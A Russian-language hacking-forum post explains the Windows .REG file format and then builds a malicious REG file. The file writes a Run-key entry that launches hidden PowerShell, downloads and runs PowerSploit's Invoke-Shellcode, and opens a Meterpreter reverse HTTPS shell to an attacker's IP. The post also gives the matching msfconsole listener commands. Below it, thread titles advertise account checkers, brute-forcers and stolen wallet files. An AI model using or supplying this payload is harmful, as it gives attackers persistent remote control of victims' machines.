Вредоносные .REG файлы или как заразить систему имея доступ только к реестру

Admin

Original poster
Administrator
Сообщения
916
Реакции
753
Посетить сайт
В этой статье, мы познакомимся со структурой REG-файлов и заодно рассмотрим один из методов создания вредоносных .REG файлов для получения meterpreter сессии.

REG-файлы - служебные текстовые файлы для внесения изменений в реестр Windows. REG-файлы были добавлены в марте 1992 года. Они имеют расширение .reg, а файлы этого типа выглядят так:
1.png
Давайте познакомимся с их структурой поближе. Формат REG-файлов является текстовым, а его структура выглядит вот так:
Код:
Windows Registry Editor Version 5.00
; Коментарии записываются так.

[Адрес1]
"Ключ1"="Значение1"
"Ключ2"="Значение2"
...
"Ключn"="Значениеn"

...
[Адресm]
"Ключl" = "Значениеl"
, где n и l - конечное число ключей, а m - конечное число изменяемых адресов.

Если в значении параметра используются специальные символы, то перед ними должен стоят знак «\» без кавычек. Стоит подметить, что формат REG-файлов напоминает формат ini-файлов, которые использовались для хранения разных данных и настроек. Однако, эпоха ini-файлов прошла с появлением реестра, но в системе эти файлы всё ещё используются (boot.ini, desktop.ini, oleinfo.ini, ...). Довольно простой формат, не так ли?

Давайте создадим REG-файл для более углубленного понимания формата.

1. Создадим на диске файл с форматом .reg.
1.png
2. Откроем его текстовым редактором и запишем следующее:
Код:
Windows Registry Editor Version 5.00 ; Эта строка показывает, что мы используем REG файлы версии 5.0.

[HKEY_LOCAL_MACHINE\Software\Test] ; Указываем адрес, ключи которого мы будем менять.
"Hello"="World" ; Создаём ключ «Hello» со значением «World».
"World"="Hello" ; Создаём ключ «World» со значением «Hello».
3. Сохраняем записанное в файл.

4. Запускаем файл. Видим User Access Control оповещение и следующее за ним предупреждение:
2 (1).png
Это один из минусов этого метода.

5. После подтверждения, REG-файл успешно добавил необходимые значения в реестр:
5.png
Как мы видим, REG-файлы успешно справляются с полученной задачей.

Мы познакомились с их структурой и работой, поэтому теперь мы можем создать кое-что поинтереснее, а именно вредоносный REG-файл, который выдаст нам meterpreter сессию.

1. Создадим на диске файл с форматом .reg.
1.png
2. Откроем его текстовым редактором и запишем следующее:

Код:
Windows Registry Editor Version 5.00 ; Эта строка показывает, что мы используем REG файлы версии 5.0.

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] ; Указываем адрес, ключи которого мы будем менять.
; Эта ветка реестра отвечает за запуск программы сразу после загрузки системы автоматически.
"payload"="powershell.exe -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force" ; Эта команда предоставит нам meterpreter сессию. Вместо 192.168.0.106 и 8007 укажите IP адрес и порт атакующего.
3. Сохраняем вредоносные данные в файл. Вредоносный REG-файл готов.


Подготовимся со стороны атакующего. Нужно всего-лишь запустить Meterpreter listener.
6.png
Последовательность команд для его запуска:
Код:
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.106
set LPORT 8007
, где вместо 192.168.0.106 и 8007 - IP адрес и порт атакующего.


Проверим работу REG-файла. Запустим вредоносный REG-файл. После запуска REG-файла, нужное значение добавилось в реестр.
7.png
После перезагрузки заражённого ПК нам прилетает Meterpreter сессия.
8.png
На этом всё. Спасибо за внимание!



 
Название темы
Автор Заголовок Раздел Ответы Дата
АнАлЬнАя ЧуПаКаБрА MYR 250 гудов reg.ru Раздача email 0
АнАлЬнАя ЧуПаКаБрА Интересно PayPal.com Reg Checker by Zaramsim // RamsCode Бруты/Парсеры/Чекеры 0
АнАлЬнАя ЧуПаКаБрА Microsoft.com Reg Checker || XAPIC Бруты/Парсеры/Чекеры 2
АнАлЬнАя ЧуПаКаБрА EA Reg Checker // UIDev Бруты/Парсеры/Чекеры 3
АнАлЬнАя ЧуПаКаБрА Amazon.com REG CHECKER \\-_-\\ BY XAPIC [UIDEV] Бруты/Парсеры/Чекеры 0
АнАлЬнАя ЧуПаКаБрА INSTAGRAM REG CHECKER \\-_-// DEVELOPED BY *_* XAPIC *_* \\-_-// Бруты/Парсеры/Чекеры 11
АнАлЬнАя ЧуПаКаБрА EBAY REG CHECKER BY *_* XAPIC *_* [ТОЧИЛКА] Бруты/Парсеры/Чекеры 1
АнАлЬнАя ЧуПаКаБрА INLINE Partypoker REG [Login;Password] Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE gamehag.com [Reg Checker] Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE EBay Reg Checker Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА Instagram Reg Checker by Lulzsec Бруты/Парсеры/Чекеры 4
АнАлЬнАя ЧуПаКаБрА INLINE hitbtc reg Проекты Private Keeper 1
АнАлЬнАя ЧуПаКаБрА Ebay Reg Checker Бруты/Парсеры/Чекеры 1
АнАлЬнАя ЧуПаКаБрА INLINE REG для заточек BTC баз. Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Twitch [REG] Проекты Private Keeper 0
RAPAX Private Keeper Megabonus [B&C&REG] Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Walmart.com Reg Checker [FREE] Проекты Private Keeper 3
АнАлЬнАя ЧуПаКаБрА INLINE BTC Pay to click (вывод без валида)+reg checker Проекты Private Keeper 1
X [Private Keeper] B&C/REG roblox.com Проекты Private Keeper 6
АнАлЬнАя ЧуПаКаБрА [Private Keeper] Пак проектов где вывод без валида + Reg check Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА Amazon Reg Checker by Dark Dantes Бруты/Парсеры/Чекеры 0
H Ситилинк reg checker Проекты Private Keeper 2
АнАлЬнАя ЧуПаКаБрА ICO Service Reg Checker and Brute/Checker #-2 Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА Amazon Reg Checker by Dark Dantes Бруты/Парсеры/Чекеры 0
АнАлЬнАя ЧуПаКаБрА INLINE BTC Pay to click (вывод без валида)+reg checker Проекты Private Keeper 0
Admin Instagram Reg Checker 2 Бруты/Парсеры/Чекеры 0
Emilio_Gaviriya Статья Деанонимизация пользователей Tor через файлы-приманки. Анонимность и приватность 1
Zarik3232 Интересно Ищем чужие файлы в Google Drive Другое 4
P как извлечь из файлов .bin файлы с помощью UltraISO ? Вопросы и интересы 1
Kalash Интересно Криптую APK файлы FUD Ищу работу. Предлагаю свои услуги. 0
Denik Интересно Операторы Maze начали публиковать файлы, украденные у компании Canon Новости в сети 0
Y Telegram. Храним файлы анонимно и безопасно Полезные статьи 4
D Троянское вредоносное ПО. Шифрует файлы с расширением .ncov Вопросы и интересы 0
E Прячем файлы в картинках Вирусология 2
W Продам или обменяю файлы wallet.dat с балансами и инфой о пароле Все что не подошло по разделу 3
S Прятачем файлы в картинке (Windows) Полезные статьи 0
M Шифруем и скрываем папки и файлы Настройка системы для работы 0
BuriTTo Как искать проиндексированные файлы anonfile.com? Другое 1
G На каких сканерах НЕЛЬЗЯ проверять криптованые файлы [ОТВЕТ] Полезные статьи 4
S cookie файлы Вирусология 3
G Прячем секретные файлы внутри аудиозаписи как Мистер Робот (DeepSound) Полезные статьи 0
K Как надёжно зашифровать файлы, диски, флешку Уязвимости и взлом 0
Traven Монетизируем чужие файлы или как заработать если ты ничего не умеешь. Способы заработка 3
D Прячем файлы внутри аудиозаписи как Мистер Робот DeepSound Уязвимости и взлом 1
E Обработаю ваши файлы wallet.dat (c стиллеров) Ищу работу. Предлагаю свои услуги. 0
W Объясните как зная Ip жертвы пересылать файлы? На компъютер жертвы. Вопросы и интересы 4
F Как определить склейку, и вытащить все файлы отдельно Софт для работы с текстом/Другой софт 0
N Как взломав http сайт видеть всех кто на него заходит, заканчивает файлы на са с нужным расширением Вопросы и интересы 4
S Операторы NotPetya доказали свою способность восстанавливать зашифрованные файлы Новости в сети 0
P Создать тему: Как зашифровать текст и файлы? Анонимность при общении в сфере кардинга с партнёрами. Анонимность и приватность 0

Название темы